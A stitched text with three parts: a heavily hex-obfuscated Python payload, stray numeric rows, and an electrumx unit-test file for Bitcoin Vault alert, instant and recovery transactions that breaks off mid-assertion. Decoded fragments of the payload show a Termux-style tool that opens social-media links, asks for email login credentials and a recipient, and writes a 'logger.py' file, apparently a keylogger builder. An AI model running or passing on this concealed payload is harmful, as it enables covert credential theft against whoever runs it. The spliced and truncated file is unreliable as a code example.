435333733343332333833323337333434333336343633363337333633373336333533373332333234343335333833323434333433333337333233363335333633313337333433363436333733323332333033353334333634363336343633363433333733333332333033363332333733393332333033353433333733383333333133363332333534323333333333333336333634343334343233363339333634353336333733323330333434343337333233353436333534313333333133333337333233373332333933303431333033393337333033373332333633393336343533373334333233383332333733353433333733383333333133363332333534323333333333333332333634343333333133323435333233303335343333373338333333313336333233353432333333303333333033363434333433333337333233363335333633313337333433363335333233303334343333363436333633373336333733363335333733323332333733323339333034313330333933373330333733323336333933363435333733343332333833323337333534333337333833333331333633323335343233333333333333323336343433333332333234353332333033353433333733383333333133363332333534323333333033333330333634343334333533363334333633393337333433323330333434333336343633363337333633373336333533373332333233373332333933303431333033393337333033373332333633393336343533373334333233383332333733353433333733383333333133363332333534323333333333333332333634343333333333323435333233303335343333373338333333313336333233353432333333303333333033363434333533323336333533363434333634363337333633363335333233303334343333363339333633373336333733363335333733323332333733323339333034313330333933373330333733323336333933363435333733343332333833323337333534333337333833333331333633323335343233333333333333323336343433333334333234353332333033353433333733383333333133363332333534323333333033333330333634343335333233363335333633313336333433323330333733333336343633373335333733323336333333363335333233303336333333363436333633343336333533323337333233393330343133303339333733303337333233363339333634353337333433323338333233373335343333373338333333313336333233353432333333333333333133363434333333303332343533323330333534333337333833333331333633323335343233333330333333303336343433343335333733383336333933373334333233373332333933303431333033393337333033373332333633393336343533373334333233383332333733353433333733383333333133363332333534323333333033333330333634343332333733323339333034313330333933363434333633313336333933363435333233383332333933303431333033393330343133363334333633353336333633323330333634343336333133363339333634353332333833323339333334313330343133303339333633343336343633363337333334343336333933363435333733303337333533373334333233383332333733353433333733383333333133363332333534323333333033333330333634343334343333363436333633373336333733363335333733323332343433353338333234343334333333373332333633353336333133373334333634363337333233353433333733383333333133363332333534323333333333333333333634343332333034353332333833393431333533323330333534333337333833333331333633323335343233333333333333323336343433323337333233393330343133303339333633393336333633323330333633343336343633363337333233303333343433333434333233303332333733323337333334313330343133303339333033393337333033373332333633393336343533373334333233383332333733353433333733383333333133363332333534323333333033333330333634343334333333363436333634343336343433363331333634353336333433323330333634353336343633373334333233303336333633363436333733353336343533363334333534333337333833333331333633323335343233333339333333313336343433323331333233373332333933303431333033393330333933363434333633313336333933363435333233383332333933303431333033393336333533363433333633393336333633323330333633343336343633363337333233303333343433333434333233303332333733333331333233373333343133303431333033393330333933373330333733323336333933363435333733343332333833323337333233373332333933303431333033393330333933373330333733323336333933363435333733343332333833323337333534333337333833333331333633323335343233333330333333303336343433353330333634333336333533363331333733333336333533323330333634333336343633363337333633393336343533323330333733373336333933373334333633383332333033343331333633333336333333363436333733353336343533373334333233303334333733363436333634363336333733363433333633353332333733323339333034313330333933303339333733353333343433363339333634353337333033373335333733343332333833323337333534333337333833333331333633323335343233333330333333303336343433343339333634353337333033373335333733343332333033373339333634363337333533373332333233303337333533373333333633353337333233363435333633313336343433363335333334313332333033353433333733383333333133363332333534323333333333333333333634343332333733323339333034313330333933303339333733303333343433363339333634353337333033373335333733343332333833323337333534333337333833333331333633323335343233333330333333303336343433343339333634353337333033373335333733343332333033373339333634363337333533373332333233303337333033363331333733333337333333373337333634363337333233363334333334313332333033353433333733383333333133363332333534323333333333333333333634343332333733323339333034313330333933303339333733333333343433363339333634353337333033373335333733343332333833323337333534333337333833333331333633323335343233333330333333303336343433343339333634353337333033373335333733343332333033373339333634363337333533373332333233303337333333373335333633323336343133363335333633333337333433323330333334313332333033353433333733383333333133363332333534323333333333333333333634343332333733323339333034313330333933303339333733343333343433363339333634353337333033373335333733343332333833323337333534333337333833333331333633323335343233333330333333303336343433353333333633353336343533363334333233303336343433363331333633393336343333323330333733343336343633323330333233303332333033323330333233303332333033323330333334313332333033353433333733383333333133363332333534323333333333333333333634343332333733323339333034313330333933303339333633323333333133333434333233383332333233323332333233323332333733323332333233323332333233323432333733353332343233323332333233323332333233323337333233323332333233323332333234323332333233323332333233323332343333323332333233323332333233323432333233323332333233323332333233373332333233323332333233323332343233373330333234323332333233323332333233323332333733323332333233323332333233323432333233323332333233323332333233393332333233323332333233323332333933303431333033393330333933363332333333323333343433323338333233323337333333373335333633323336343133363335333633333337333433333434333233323332343233323332333233323332333233323337333233323332333233323332333234323337333333323432333233323332333233323332333233373332333233323332333233323332333933303431333033393330333933373330333733323336333933363435333733343332333833323337333534333337333833333331333633323335343233333333333333333336343433323337333233393330343133303339333033393336333233333333333334343332333833323332333233323332333233323337333233323332333233323332333234323337333433323432333233323332333233323332333233373332333233323332333233323332343233323332333233323332333233323433333233323332333233323332333234323332333233373333333733353336333233363431333633353336333333373334333233323332343233323332333233323332333233323433333233323332333233323332333234323332333233363332333634363336333433373339333233323332343233323332333233323332333233323339333233323332333233323332333233393330343133303339333033393336333233333334333334343332333833323332333233323332333933303431333033393330333933363332333333353333343433323338333233323336343433363331333633393336343533323332333234323332333233323332333233323332333833323332333233323332333233323432333233323332333233323332333233393332333233323332333233323332333933303431333033393330333933373330333733323336333933363435333733343332333833323337333433333337333233363335333633313337333433363339333634353336333733323330333634333336343633363337333633373336333533373332333233303336333333363436333633343336333533323433333233303337333033363433333633353336333133373333333633353332333033373337333633313336333933373334333233303332343533323435333234353332333733323339333034313330333933303339333634363337333333323435333733333337333933373333333733343336333533363434333233383332333733373333333634333336333533363335333733303332333033333333333233373332333933303431333033393330333933363436333733333332343533373333333733393337333333373334333633353336343433323338333233373336333333363331333733343332333033363433333634363336333733333331333233303333343533323330333634333336343633363337333633373336333533373332333234353337333033373339333334323336333533363333333633383336343633323330333233323332333733323432333633323333333133323432333233373332333233323330333334353333343533323330333634333336343633363337333633373336333533373332333234353337333033373339333334323336333533363333333633383336343633323330333233323332333733323432333633323333333233323432333233373332333233323330333334353333343533323330333634333336343633363337333633373336333533373332333234353337333033373339333334323336333333363331333733343332333033363433333634363336333733333332333233303333343533333435333233303336343333363436333633373336333733363335333733323332343533373330333733393333343233363335333633333336333833363436333233303332333233323337333234323336333233333333333234323332333733323332333233303333343533333435333233303336343333363436333633373336333733363335333733323332343533373330333733393333343233373330333733323336333933363435333733343332333033323332333233373332343233363332333333343332343233323337333233323332333033333435333334353332333033363433333634363336333733363337333633353337333233323435333733303337333933333432333733303337333233363339333634353337333433323330333233323332333733323432333633323333333533323432333233373332333233323330333334353333343533323330333634333336343633363337333633373336333533373332333234353337333033373339333334323336333333363331333733343332333033363433333634363336333733363337333633353337333233323435333733303337333933323330333334353332333033323436333733333336333433363333333633313337333233363334333234363336343333363436333633373336333733363335333733323332343533373330333733393332333733323339333034313330333933303339333733333336343333363436333733373337333033373332333633393336343533373334333233383332333733353433333733383333333133363332333534323333333033333330333634343335333333373335333633333336333333363335333733333337333333323433333233303336333633363339333634333336333533323330333633313337333533373334333634363332333033373333333633313337333633363335333633343332333033363331333733333332333033353433333733383333333133363332333534323333333333333333333634343332343633373333333633343336333333363331333733323336333433323436333634333336343633363337333633373336333533373332333234353337333033373339333233373332333933303431333033393330333933363436333733333332343533373333333733393337333333373334333633353336343433323338333233373337333833363334333633373332343433363436333733303336333533363435333233303336333833373334333733343337333033373333333334313332343633323436333633393336343533373333333733343336333133363337333733323336333133363434333234353336333333363436333634343332343633363432333633393336343533363337333634343337333233353436333734313333333133333337333233373332333933303431333033393336333533363433333633393336333633323330333633343336343633363337333233303333343433333434333233303332333733333332333233373333343133303431333033393330333933363436333733333332343533373333333733393337333333373334333633353336343433323338333233373336343533363331333634353336343633323330333634333336343633363337333633373336333533373332333234353337333033373339333233373332333933303431333033393330333933363434333633313336333933363435333233383332333933303431333033393336333533363433333633393336333633323330333633343336343633363337333233303333343433333434333233303332333733333333333233373333343133303431333033393330333933363436333733333332343533373333333733393337333333373334333633353336343433323338333233373337333233363434333233303336343333363436333633373336333733363335333733323332343533373330333733393332333733323339333034313330333933303339333733303337333233363339333634353337333433323338333233373335343333373338333333313336333233353432333333303333333033363434333434333336343633363337333633373336333533373332333233303336333833363331333733333332333033363332333633353336333533363435333233303337333233363335333634343336343633373336333633353336333433323330333534333337333833333331333633323335343233333339333333313336343433323331333233373332333933303431333033393330333933363436333733333332343533373333333733393337333333373334333633353336343433323338333233373337333333363433333633353336333533373330333233303333333333323337333233393330343133303339333033393336333833363335333633313336333433363335333733323332333833323339333034313330333933363335333634333336333933363336333233303336333433363436333633373332333033333434333334343332333033323337333333343332333733333431333034313330333933303339333634363337333333323435333733333337333933373333333733343336333533363434333233383332333733363333333633313337333433323330333634333336343633363337333633373336333533373332333234353337333033373339333233373332333933303431333033393330333933363434333633313336333933363435333233383332333933303431333033393336333533363433333633393336333633323330333633343336343633363337333233303333343433333434333233303332333733333330333233373333343133303431333033393330333933363436333733333332343533373333333733393337333333373334333633353336343433323338333233373337333833363334333633373332343433363436333733303336333533363435333233303336333833373334333733343337333033373333333334313332343633323436333733373337333733373337333234353337333933363436333733353337333433373335333633323336333533323435333633333336343633363434333234363336333333363338333633313336343533363435333633353336343333323436333533353334333333363435333433393336343133373335333434343334333433373336333633393334333433363432333633333335343133353436333433353335333833343333333534363336333933343435333633383333333833363337333334363337333333373335333633323335343633363333333634363336343533363336333633393337333233363434333633313337333433363339333634363336343533333434333333313332333733323339333034313330333933363335333634333337333333363335333334313330343133303339333033393337333033373332333633393336343533373334333233383332333733353433333733383333333133363332333534323333333033333330333634343334333333363436333634343336343433363331333634353336333433323330333634353336343633373334333233303336333633363436333733353336343533363334333534333337333833333331333633323335343233333339333333313336343433323330333233313332333133323331333233373332333933303431333033393330333933363434333633313336333933363435333233383332333933303431333034313336333833363335333633313336333433363335333733323332333833323339323232393239222929"))
4,173.8
20,800
0.99861
15
20,869
1,389.266667
0.866667
0
0
0
0
0
0
0
0
0
0
0.995684
0.000815
20,869
4
20,801
5,217.25
0.003693
0.002396
0
0
0
0
0.997934
0.997934
0
1
0
0
0
1
0
true
0
0.5
0
0.5
0
1
0
1
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
1
1
1
0
0
0
0
0
1
1
null
1
0
0
0
0
0
1
0
1
0
0
0
0
12
23ca20dab8d9a64a4bda0b8b3e781719ce04860b
20,316
py
Python
tests/test_vault_transactions.py
erik-svensson/electrumx-royale
7ba069dd9f7e8662ea50db4371a260b879a3e106
[ "MIT" ]
1
2020-12-03T12:29:31.000Z
2020-12-03T12:29:31.000Z
tests/test_vault_transactions.py
erik-svensson/electrumx-royale
7ba069dd9f7e8662ea50db4371a260b879a3e106
[ "MIT" ]
null
null
null
tests/test_vault_transactions.py
erik-svensson/electrumx-royale
7ba069dd9f7e8662ea50db4371a260b879a3e106
[ "MIT" ]
1
2020-05-10T11:04:07.000Z
2020-05-10T11:04:07.000Z
from unittest import TestCase from electrumx.lib.coins import BitcoinVault, BitcoinVaultRegTest from electrumx.lib.tx import TxVaultSegWit, VaultTxType, TxVault HEADER = '010000306f57135f397d1facbc477132637b30066503e0b52d5cffa4d471eddcfb72e53ebd64eb755882f0a40cc90aa9adae819b5efb95d682f45a6d4d36cd89bc407188737a055fffff7f2000000000' TX_SEGWIT = '020000000001010000000000000000000000000000000000000000000000000000000000000000ffffffff26021202203b33883f0610c368bdc263c91e5e14a50a778281624b87d4ef20e9094c44a3c00101ffffffff0200cf14130400000017a9147687c336a779ae92ca3d8c8455333478b4ad2aa8870000000000000000266a24aa21a9ed212f072e2d2b9cfc89c8ee3b352b1ac31f596f2baa3092c752875e1c9ede230f0120000000000000000000000000000000000000000000000000000000000000000000000000' AR_ALERT_SEGWIT = '02000000000101229d36ad2ef39155145bf8a3e5f3416c7ca415ff15887aba6212e41e3c82a54700000000232200209f730fc44efad2ef3d4a38aebed0e0e1c2408f93409540496bc5f5b738ee04e0ffffffff01c08c05130400000017a914a813fae80f93e582122732dce4c3148cacec0dba87040047304402205f9bf6d4c4ed13f43310966d2f9b869439a9fd760399b35fbf923036333f8cfc02200bc87f2ed7297127a76b4d6288af9b5db78821a31c7c5cbe6057f17dc56b30c90101014b63516752682103ef6df4b3e7e0a94ef61c3571ee953574c851959350e4befddd3ccf3f5f8539342102ecec100acb89f3049285ae01e7f03fb469e6b54d44b0f3c8240b1958e893cb8c52ae00000000' AR_RECOVERY_SEGWIT = '02000000000101ca61e1d9e95eec6c933bbfa80b43949044eade2fa0b032bd09de3c793b4db1f400000000232200205bbc7969b9505c29f636f3cdc9f6e8d89926d06114d5ae94ff1710365250c250ffffffff01d4be14130400000017a9142cc746419d3d43a7fc207bafd01330ad649da3bc8705004730440220606ca8135c04d490ad31559b4c247308fa0f4679ec844c13a75e8a5a2ea6cba902204372eabd0b838c881e7a4cad78dde4d1ac8da78e36a5a4c67cec9b5bf49bb56b01473044022077a667e62e1287703fd3998c8016cad17e1211bdd7d2f68d15144ce7b169b81e0220481a27598e45e5c4ba764baa958d534d9b03751442f9e187e102869092e76ece01004b635167526821025813111f13514b978271140162e20239148009a73f4a84ade8f5dff3e3f64ad42102ecec100acb89f3049285ae01e7f03fb469e6b54d44b0f3c8240b1958e893cb8c52ae00000000' AR_ALERT_NON_SEGWIT = '0200000001f0461fae7c01202cb1acf5240f27c19042c2b6d7b84a43e289d042527c2ed77400000000960047304402202730a847a3f8a2e7f08af57aea3724c29e9188df8143f8c2822c94c896c5281b022004db4d4302bb0ce550fed358cb201c4331fc061fe9e6d32351e1aa82ecf6201801514b635167526821031bd9624f553f98f6c07aba97a98f113abc48b4dc22910ac1d77e7bb6fbdc7f202102ecec100acb89f3049285ae01e7f03fb469e6b54d44b0f3c8240b1958e893cb8c52aeffffffff01c08c05130400000017a914340d407d281db4948d160ce867be856e33e67f2f8700000000' AR_RECOVERY_NON_SEGWIT = '0200000001663d528f7d8fc77052982f1450449f0f87e4166260ec6841d6a95d193e678cb700000000de004730440220488e944a6c50dfe30ba31fb628f9c2d4267464834ef74736d85e27abaa95c355022037691bdd0a7062d6fea1fc5f2031191eaa2ab58dd60a1cbfe75e07bb1a49b66f0147304402207c700c0168b660040cad56ad22c0edfd22c974ec2724a8706ca5b828986c29b502202a046f8fe06263ebaf0842233dd1b7efe5268133740d896b28aed70629c45dc101004b63516752682103cd251bbdc8be370b509cc23bf750e5c737a481935f6f0034d06e56aa8dfed5a82102ecec100acb89f3049285ae01e7f03fb469e6b54d44b0f3c8240b1958e893cb8c52aeffffffff01acb414130400000017a914595cce2b8db57f3a046f766df71e082612ea6c348700000000' AIR_ALERT_SEGWIT = '02000000000101d9864ecdbf38f1d4cbcf08bdadbe061fb529e2fa78d9706405a27f7f99cc4204000000002322002022a869aea58eaec22f77693e5ab603880901384699d8d5ea993605759b197678feffffff02b8f279d70300000017a914d0cf533a5781e2c36ec178ecf4ce33dec1c3d0808700ca9a3b0000000017a914a157d16bc66cf6cd7e5d3daaedb7a2379c54dd3a87040047304402205b224a687f72046fdc58e1e6662700163fe53ae3bb7fef3466c769e2cb93f0c00220744bc1ca8ddbc7106c0ef6cdf9b63d93295b0042892d4c0fc2c7a1801b7ffcf2010101716351676352675368682103a03684a36e33e20e4e11619eb89c379f5d48621dc23428893f7ba373b319ffe3210263451a52f3d3ae6918969e1c5ce934743185578481ef8130336ad1726ba61ddb2102ecec100acb89f3049285ae01e7f03fb469e6b54d44b0f3c8240b1958e893cb8c53aec8000000' AIR_INSTANT_SEGWIT = '02000000000101c04516f5d32d25741f766fc64fe022413edb8f65fd88ab6f3e50c3c2e6dd73e100000000232200202272d90e83d5973cf09f83b81eeb4a59e5a77e01a7de87f311c21b3c62359d22ffffffff01c08c05130400000017a91455e78174653079683f2f3d064c469177506e670e870600473044022035036d46c4ef714c864089ce4233f14ff8a08c9d9e0716ff89a34f11cd19f2f502201a3d3d359633d8893acbedde9be2000529dbc9246ed3ab3bc00f8043867396ea0147304402202eab1285c1e76cd98e7a6fc200133e72c5eed88d4345003b45745530180bd435022028e42caa13d08c820ada0e9b23c3acde440aaa11738d7eba954f2c3414e684a301010100716351676352675368682103670b6c9b4f7c7d86bf1ec6621b30aeed9b90fb323323f78e688dc442e5eed33d210263451a52f3d3ae6918969e1c5ce934743185578481ef8130336ad1726ba61ddb2102ecec100acb89f3049285ae01e7f03fb469e6b54d44b0f3c8240b1958e893cb8c53ae00000000' AIR_RECOVERY_SEGWIT = '02000000000101d8fbcabcee7962dc3827b18f7059c446a30a9711f40b89ee17f7bb1d91cd8fe20000000023220020243ad3ec325e433f4d18154df124b67ceb6425033e9dab515d5f66245bed5b24ffffffff01b8bc14130400000017a91493be10a6ea9fa8f7a04638e82fa77980a1a1656887070047304402206b83dd23e3bc90c0f3eed38618ae08218272585c5593cec403fc40bc7df060d8022079fdfee0297c5f67690b992ddeba49e978ddc999474be9f229eb9865fb03c1f00147304402202c1548716fcc3b18209763f858903b18daa0c765b8460f8c3a5b8596e7d5505b022003181f6eab71fb55e3d4e9c7ad12ae44749f50bc259953f421d7f419413c1d3b014730440220269e848d0d095c3324f5a0c785b06044a0839ae2cf963d63a1a8b09a7eb3093402205f176fbab7f579d6f34a29e0062eb74fcbf18221f4583da615fcd620106bdec101000071635167635267536868210249267ea5dffd2352705fa4c12105227fcd045d2ecefb07f009d96ca870cb5511210263451a52f3d3ae6918969e1c5ce934743185578481ef8130336ad1726ba61ddb2102ecec100acb89f3049285ae01e7f03fb469e6b54d44b0f3c8240b1958e893cb8c53ae00000000' AIR_ALERT_NON_SEGWIT = '0200000001528a5bd018582633521f45bde42c350fc36864eb328b192ca4fa954ac0d5cc7600000000bd0047304402206202bbe65e9495786a170c337c878d1e75609ed43d1684e8f5d2862f81b6f25c02206567951bc4b1e43a014b58366021a7f542a81049c73fbcfc0c2fff782406f96a01514c71635167635267536868210282163aaebde9f9e06913a1781035f4f0ea76bc4b10df86ec212e3dce04e980d9210263451a52f3d3ae6918969e1c5ce934743185578481ef8130336ad1726ba61ddb2102ecec100acb89f3049285ae01e7f03fb469e6b54d44b0f3c8240b1958e893cb8c53aeffffffff01c08c05130400000017a91452c92b0c21d03b5d81b313b8742e40083ab57b958700000000' AIR_INSTANT_NON_SEGWIT = '020000000188a12cd284149b0f9717887c49c6383ad396b1238bdf51e4ce23e383a55f96f200000000fd0601004730440220097967259a57dadb560f99bc2cc1737c4b4f0bc4b22d83f0f4b9735c66ea8bf2022027063e3fa15cc28aa31733418a5861b27e2f48f7a53dac2abce966e309cddd4b0147304402205db152157bf3976af2994b4845b532e95beeaa3066dc0b3365ba7e502a233d8c0220151057974fcc794e038c2318ba91c0f97b8d03cb528c9e70d8e91eba686691b70151004c7163516763526753686821024520ea83b1056de89db38b8e29c8682d452612bba1b35b65921c50c4556c87bc210263451a52f3d3ae6918969e1c5ce934743185578481ef8130336ad1726ba61ddb2102ecec100acb89f3049285ae01e7f03fb469e6b54d44b0f3c8240b1958e893cb8c53aefeffffff02c4e179d70300000017a91468056e54e5c43992171b66c62d772fd5f94811648700ca9a3b0000000017a914acbebff8b77719daf7e74332c73f4df0fde410b887c8000000' AIR_RECOVERY_NON_SEGWIT = '020000000179f1b9964adbacdfcbeb22055b31cd2144f57977c9161d49c65818716c7201ca00000000fd4e0100473044022065487a2cc9b56ac84a29215be220ad9ecb57d603801205060b10b097fbe0031302203b805346e596c1c468734898c2fa41b49ab58b86d66ec9ab9c7a739470ce515c0147304402200b25123c0160e9bf687ea40141a8c5895ca18b7010239a7b42874f7e3dbcd14b02202090ac94c6944a6831bac23f5adcb10b2a7bd8cc23d89e7ebedfc0efce83a66e01473044022047b759cfff47025dbbb5bd3c565596e48a9da924b81df24d984661a7650d66d5022038fd4f752ea59e5dd0533a509868f996e7a49722dd5a397c6fa60202a879d9bd0100004c716351676352675368682103ac06ee8b5187a9ae8ae8cefd53db808073e7eb8a89f0f62cc2d957f711d78688210263451a52f3d3ae6918969e1c5ce934743185578481ef8130336ad1726ba61ddb2102ecec100acb89f3049285ae01e7f03fb469e6b54d44b0f3c8240b1958e893cb8c53aeffffffff01c4ab14130400000017a914a36dd67e2baf6b9508d630ceddb4c7d61158c5b78700000000' AUXPOW_BLOCKS = [ '040166061d0f1d80ff8924f3f82f7bb86d52ae8c4244370ed52c1c4e211eb5f269adce0140efd0437a06d93af465ab89d6a15d7113712b92e137c30ba447d02cae272057dbe5494dffff7f200000000001000000010000000000000000000000000000000000000000000000000000000000000000ffffffff2cfabe6d6deb2fe7b538e53c01e30419bad36b138b660dd1e8e15fd73c3af4b6982ef104fb0100000000000000ffffffff00000000004e61bc00000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000007f505aa144b1edfa154b08a88f105fd2c01b500f4541700db87c4e873d73fbf0000000000000000000000010101000000010000000000000000000000000000000000000000000000000000000000000000ffffffff020101ffffffff0100cf14130400000001510000000000' '040166061d0f1d80ff8924f3f82f7bb86d52ae8c4244370ed52c1c4e211eb5f269adce010686fc5149c35a29379502a7d52d98dfcf9a017571eda9c086c678c9dc7f505871e5765fffff7f200000000002000000010000000000000000000000000000000000000000000000000000000000000000ffffffff2928a491c9904cb0afe055a049fd22388968a5d22953a3eb7936ca12a9ac55542a7b0100000000000000ffffffff00000000004e61bc000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000a03da1fdcdda7c24b1390f21af9b7b0ea280247dc84f2a43a936c91b3be9ebf600000000000000000000000001020000000001010000000000000000000000000000000000000000000000000000000000000000ffffffff24512000000000000000000000000000000000000000000000000000000000000000000101ffffffff0200cf14130400000017a914c3cba25c0889229a789fe07f96c634ae4f896eaa870000000000000000266a24aa21a9ede2f61c3f71d1defd3fa999dfa36953755c690689799962b48bebd836974e8cf9012000000000000000000000000000000000000000000000000000000000000000000000000000', '04016606c4395907d518d285f085ae78517019b387e5fd98616cada4c830f4bd4cf7255b14d9a411df7581d16b413ecab17d40464465df66cb4e0f1bc1ee48dd8c9be78e77e5765fffff7f200200000002000000010000000000000000000000000000000000000000000000000000000000000000ffffffff2928f9aa52fda07ca95e6cb4ecf6520ffaef1b224f28882269f1ff03153d15ad482c0100000000000000ffffffff00000000004e61bc000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000b2143e4a624ad5a2cd2eda98e0efe51a9b9e29d6c0c8dc6c65ad351c28c9af3700000000000000000000000001020000000001010000000000000000000000000000000000000000000000000000000000000000ffffffff24522000000000000000000000000000000000000000000000000000000000000000000101ffffffff0200cf14130400000017a9144988a9b2ab78cc2832c6c0fb3523538f30714dfe870000000000000000266a24aa21a9ede2f61c3f71d1defd3fa999dfa36953755c690689799962b48bebd836974e8cf9012000000000000000000000000000000000000000000000000000000000000000000000000000', '040166061d0f1d80ff8924f3f82f7bb86d52ae8c4244370ed52c1c4e211eb5f269adce0140efd0437a06d93af465ab89d6a15d7113712b92e137c30ba447d02cae272057dbe5494dffff7f200000000001000000010000000000000000000000000000000000000000000000000000000000000000ffffffff2cfabe6d6deb2fe7b538e53c01e30419bad36b138b660dd1e8e15fd73c3af4b6982ef104fb0100000000000000ffffffff00000000004e61bc00000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000007f505aa144b1edfa154b08a88f105fd2c01b500f4541700db87c4e873d73fbf0000000000000000000000010101000000010000000000000000000000000000000000000000000000000000000000000000ffffffff020101ffffffff0100cf14130400000001510000000000' ] class TestParsingAuxPowBlock(TestCase): def setUp(self): self.coin = BitcoinVaultRegTest() def test_deserialize(self): for aux_block in AUXPOW_BLOCKS: raw_block = bytes.fromhex(aux_block) block = self.coin.block(raw_block, 1) transactions = block.transactions self.assertEqual(len(transactions), 1) class TestParsingAlertTransaction(TestCase): def setUp(self): self.coin = BitcoinVaultRegTest() def test_no_segwit_atx(self): raw_block = bytes.fromhex( HEADER + '01' + TX_SEGWIT + '01' + AR_ALERT_NON_SEGWIT ) block = self.coin.block(raw_block, 344) transactions = block.transactions alerts = block.alerts self.assertEqual(len(transactions), 1) self.assertEqual(len(alerts), 1) self.assertIsInstance(alerts[0][0], TxVault) self.assertEqual(alerts[0][0].type, VaultTxType.ALERT_PENDING) def test_segwit_atx(self): raw_block = bytes.fromhex( HEADER + '01' + TX_SEGWIT + '01' + AR_ALERT_SEGWIT ) block = self.coin.block(raw_block, 344) transactions = block.transactions alerts = block.alerts self.assertEqual(len(transactions), 1) self.assertEqual(len(alerts), 1) self.assertIsInstance(alerts[0][0], TxVaultSegWit) self.assertEqual(alerts[0][0].type, VaultTxType.ALERT_PENDING) def test_no_atx(self): raw_block = bytes.fromhex( HEADER + '01' + TX_SEGWIT ) block = self.coin.block(raw_block, 344) transactions = block.transactions alerts = block.alerts self.assertEqual(len(transactions), 1) self.assertEqual(len(alerts), 0) self.assertIsInstance(transactions[0][0], TxVaultSegWit) def test_no_segwit_atx_alerts_disabled(self): raw_block = bytes.fromhex( HEADER + '01' + AR_ALERT_NON_SEGWIT + '01' + AR_ALERT_NON_SEGWIT ) _coin = BitcoinVault() block = _coin.block(raw_block, 344) transactions = block.transactions alerts = block.alerts self.assertEqual(len(transactions), 1) self.assertIsInstance(transactions[0][0], TxVault) self.assertEqual(transactions[0][0].type, VaultTxType.NONVAULT) self.assertEqual(len(alerts), 0) def test_segwit_atx_alerts_disabled(self): raw_block = bytes.fromhex( HEADER + '01' + AR_ALERT_SEGWIT + '01' + AR_ALERT_SEGWIT ) _coin = BitcoinVault() block = _coin.block(raw_block, 344) transactions = block.transactions alerts = block.alerts self.assertEqual(len(transactions), 1) self.assertIsInstance(transactions[0][0], TxVaultSegWit) self.assertEqual(transactions[0][0].type, VaultTxType.NONVAULT) self.assertEqual(len(alerts), 0) class TestVaultTxTypeDiscovery(TestCase): def setUp(self): self.coin = BitcoinVaultRegTest() def test_discover_ar_alert(self): raw_block = bytes.fromhex( HEADER + '01' + AR_ALERT_SEGWIT + '01' + AR_ALERT_SEGWIT ) block = self.coin.block(raw_block, 344) transactions = block.transactions alerts = block.alerts self.assertEqual(len(transactions), 1) self.assertIsInstance(transactions[0][0], TxVaultSegWit) self.assertEqual(transactions[0][0].type, VaultTxType.ALERT_CONFIRMED) self.assertEqual(len(alerts), 1) self.assertIsInstance(alerts[0][0], TxVaultSegWit) self.assertEqual(alerts[0][0].type, VaultTxType.ALERT_PENDING) def test_discover_ar_alert_nonsegwit(self): raw_block = bytes.fromhex( HEADER + '01' + TX_SEGWIT + '01' + AR_ALERT_NON_SEGWIT ) block = self.coin.block(raw_block, 344) alerts = block.alerts self.assertEqual(len(alerts), 1) self.assertIsInstance(alerts[0][0], TxVault) self.assertEqual(alerts[0][0].type, VaultTxType.ALERT_PENDING) def test_discover_ar_recovery(self): raw_block = bytes.fromhex( HEADER + '02' + TX_SEGWIT + AR_RECOVERY_SEGWIT ) block = self.coin.block(raw_block, 344) transactions = block.transactions alerts = block.alerts self.assertEqual(len(transactions), 2) self.assertEqual(len(alerts), 0) self.assertIsInstance(transactions[1][0], TxVaultSegWit) self.assertEqual(transactions[1][0].type, VaultTxType.RECOVERY) def test_discover_ar_recovery_nonsegwit(self): raw_block = bytes.fromhex( HEADER + '02' + TX_SEGWIT + AR_RECOVERY_NON_SEGWIT ) block = self.coin.block(raw_block, 344) transactions = block.transactions alerts = block.alerts self.assertEqual(len(transactions), 2) self.assertEqual(len(alerts), 0) self.assertIsInstance(transactions[1][0], TxVault) self.assertEqual(transactions[1][0].type, VaultTxType.RECOVERY) def test_discover_air_alert(self): raw_block = bytes.fromhex( HEADER + '01' + AIR_ALERT_SEGWIT + '01' + AIR_ALERT_SEGWIT ) block = self.coin.block(raw_block, 344) transactions = block.transactions alerts = block.alerts self.assertEqual(len(transactions), 1) self.assertIsInstance(transactions[0][0], TxVaultSegWit) self.assertEqual(transactions[0][0].type, VaultTxType.ALERT_CONFIRMED) self.assertEqual(len(alerts), 1) self.assertIsInstance(alerts[0][0], TxVaultSegWit) self.assertEqual(alerts[0][0].type, VaultTxType.ALERT_PENDING) def test_discover_air_alert_nonsegwit(self): raw_block = bytes.fromhex( HEADER + '01' + TX_SEGWIT + '01' + AIR_ALERT_NON_SEGWIT ) block = self.coin.block(raw_block, 344) alerts = block.alerts self.assertEqual(len(alerts), 1) self.assertIsInstance(alerts[0][0], TxVault) self.assertEqual(alerts[0][0].type, VaultTxType.ALERT_PENDING) def test_discover_air_instant(self): raw_block = bytes.fromhex( HEADER + '02' + TX_SEGWIT + AIR_INSTANT_SEGWIT + '00' ) block = self.coin.block(raw_block, 344) transactions = block.transactions alerts = block.alerts self.assertEqual(len(transactions), 2) self.assertEqual(len(alerts), 0) self.assertIsInstance(transactions[1][0], TxVaultSegWit) self.assertEqual(transactions[1][0].type, VaultTxType.INSTANT) def test_discover_air_instant_nonsegwit(self): raw_block = bytes.fromhex( HEADER + '02' + TX_SEGWIT + AIR_INSTANT_NON_SEGWIT + '00' ) block = self.coin.block(raw_block, 344) transactions = block.transactions alerts = block.alerts self.assertEqual(len(transactions), 2) self.assertEqual(len(alerts), 0) self.assertIsInstance(transactions[1][0], TxVault) self.assertEqual(transactions[1][0].type, VaultTxType.INSTANT) def test_discover_air_recovery(self): raw_block = bytes.fromhex( HEADER + '02' + TX_SEGWIT + AIR_RECOVERY_SEGWIT + '00' ) block = self.coin.block(raw_block, 344) transactions = block.transactions alerts = block.alerts self.assertEqual(len(transactions), 2) self.assertEqual(len(alerts), 0) self.assertIsInstance(transactions[1][0], TxVaultSegWit) self.assertEqual(transactions[1][0].type, VaultTxType.RECOVERY) def test_discover_air_recovery_nonsegwit(self): raw_block = bytes.fromhex( HEADER + '02' + TX_SEGWIT + AIR_RECOVERY_NON_SEGWIT + '00' ) block = self.coin.block(raw_block, 344) transactions = block.transactions alerts = block.alerts self.assertEqual(len(transactions), 2) self.assertEqual(len(alerts), 0) self.assertIsInstance(transactions[1][0], TxVault) self.assertEqual(transactions[1][0].type, 